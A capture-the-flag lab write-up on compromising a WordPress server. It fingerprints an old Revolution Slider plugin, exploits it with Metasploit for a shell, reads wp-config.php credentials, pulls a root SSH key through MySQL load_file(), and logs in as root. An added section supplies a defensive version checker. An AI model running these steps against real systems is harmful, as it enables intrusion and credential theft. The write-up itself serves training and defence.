Tags: wordpress network pentest
Rating:
# Wordpress
We're given a Wordpress site and told that it runs the Revolution Slider plugin, and that the plugin is a little bit old. Let's find out how old by looking at the release log. WordPress stores plugins under `wp-content/plugins/`, with each plugin in its own folder named after the plugin. In this case, Revolution Slider lives in the `revslider/` folder, which we can browse to directly.
```
http://172.30.0.3/wp-content/plugins/revslider/
```
![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-TAMU/images/Wordpress-1.png)
Let's have a look at that `release_log.txt` file.
![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-TAMU/images/Wordpress-2.png)
Looks like it's running 3.0.95. This is indeed a [vulnerable](https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_revslider_upload_execute) version of Revolution Slider. Metasploit has a module to handle this.
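Reading the version off a screenshot works for one box; as an added example that is not part of the original write-up, the following Python script parses a revslider `release_log.txt` (entry format assumed to be a line starting with `Version X.Y.Z`) and reports whether the newest entry falls in the range the linked Rapid7 module covers, 3.0.95 and prior. It is meant for checking WordPress installs you administer, and with no URL argument it runs offline against a constructed sample log.

```python
"""Added example (not from the write-up): flag a revslider release log that shows a vulnerable version."""
import re
import sys
import urllib.request
from typing import Optional, Tuple

Version = Tuple[int, ...]
# The Rapid7 module linked in the write-up covers revslider 3.0.95 and prior.
VULNERABLE_MAX: Version = (3, 0, 95)
# Assumed entry format: a line starting with "Version X.Y.Z"; adjust if the real log differs.
VERSION_RE = re.compile(r"^\s*Version\s+(\d+(?:\.\d+)*)", re.IGNORECASE | re.MULTILINE)
# Constructed sample log for offline use, not the real file from the target.
SAMPLE_RELEASE_LOG = """\
Version 3.0.95 (constructed sample)
 - Fixed: placeholder entry
Version 3.0.9
 - Added: placeholder entry
"""

def parse_version(text: str) -> Version:
    """Turn '3.0.95' into (3, 0, 95) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in text.split("."))

def latest_version(log_text: str) -> Optional[Version]:
    """Highest version mentioned anywhere in the log, or None if no entry parses."""
    found = [parse_version(m.group(1)) for m in VERSION_RE.finditer(log_text)]
    return max(found) if found else None

def is_vulnerable(version: Version) -> bool:
    """True when the installed version is at or below the last known-vulnerable release."""
    return version <= VULNERABLE_MAX

def fetch_release_log(base_url: str) -> str:
    """Download the log from the path the write-up used; run this against sites you administer."""
    url = base_url.rstrip("/") + "/wp-content/plugins/revslider/release_log.txt"
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")

if __name__ == "__main__":
    text = fetch_release_log(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_RELEASE_LOG
    ver = latest_version(text)
    if ver is None:
        print("no version entries found; the log may not use the assumed format")
    else:
        state = "VULNERABLE (3.0.95 or prior)" if is_vulnerable(ver) else "not in the affected range"
        print("revslider %s: %s" % (".".join(map(str, ver)), state))
```

The fix on the defender's side is the same regardless of what the script reports: update the plugin, and stop serving plugin metadata files such as `release_log.txt` from the web root.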
```
$ msfconsole
msf> search revolution
msf> use unix/webapp/wp_revslider_upload_execute
msf> set RHOSTS 172.30.0.3
msf> exploit
```
![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-TAMU/images/Wordpress-3.png)
Looks like we've successfully spawned a meterpreter session! Let's drop into a system shell and look around.
```
meterpreter> shell
```
After some snooping, we find an interesting file called `note.txt` in `/var/www/`. Reading it gives us a hint.
```
$ cat /var/www/note.txt
```
![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-TAMU/images/Wordpress-4.png)
Looks like there must be a database somewhere. Let's find out where by reading the `wp-config.php` file.
```
$ cat /var/www/wp-config.php
```
![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-TAMU/images/Wordpress-5.png)
Alright, that's our way into the database: `wp-config.php` holds the database host and credentials. Let's go back to our own system, connect to the database, and have a look around. We're told that the SSH key is in `/backup/id_rsa`, so once connected we can read it with MySQL's `load_file()`. This only works because the `wordpress` database user holds the FILE privilege and `secure_file_priv` is not restricting where the server may read from, which is exactly what a hardened database would prevent.
```
$ mysql -h 172.30.0.2 -u wordpress --password="0NYa6PBH52y86C"
mysql> select load_file("/backup/id_rsa");
```
![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-TAMU/images/Wordpress-6.png)
![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-TAMU/images/Wordpress-7.png)
Looks like we found it.
Now we just need to paste this into a file on our own system, set the appropriate permissions (SSH refuses a private key that is readable by others, hence the `chmod 400`), and then we can SSH into the root account and view the flag.
```
$ chmod 400 rsa.key
$ ssh -i rsa.key root@<target host>
```
![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-TAMU/images/Wordpress-8.png)